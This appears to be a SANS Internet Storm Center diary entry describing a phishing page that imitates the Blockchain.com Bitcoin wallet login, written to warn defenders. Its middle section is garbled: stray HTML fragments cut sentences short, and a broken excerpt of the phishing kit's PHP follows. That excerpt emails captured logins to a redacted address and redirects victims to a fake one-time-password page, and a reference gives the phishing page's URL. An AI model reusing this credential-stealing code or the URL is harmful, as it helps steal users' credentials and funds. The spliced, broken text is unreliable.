Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields:
| Internet actors | Google, Yahoo!, Facebook, ... |
| Software or manufacturers | Apple, Microsoft, Adobe, ... |
| Financial Services | Paypal, BoA, name your preferred bank, ... |
| Services | DHL, eBay, ... |
But the landscape of online services is ever changing and new actors (and more precisely their customers) become new interesting targets. Yesterday, while hunting, I found for the first time aphishing page trying to lure the Bitcoinoperator: BlockChain. Blockchain[1] is a key player in the management of width:600px" />
Hopefully, the webshellisn padding:5px 10px"> $from = From: b [email protected]\n $from .= MIME-Version: 1.0\r\n $from .= charset=ISO-8859-1\r\n if(@$_GET[accedi]==login){ mail([email protected] header( Location: richiesta_otp.html }else{
Note that the login procedure on BlockChain is extremely strong: 2FA authentication and one-time link is sent via email to approve all login attempts. Be sure that activate them if youre a BlockChain customer.
The fact that Bitcoins, the digital currency, is getting more and more popular makes it a new interesting target for attackers. And this is also the case in corporate environments: There is a trend in companies that make a reserve of Bitcoins to prevent possible Ransomware attacks![3]
[1] https://www.blockchain.com
[2]http://klimatika.com.ua/block/
[3]https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
© SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Article Link: https://isc.sans.edu/diary.html?storyid=22482&rss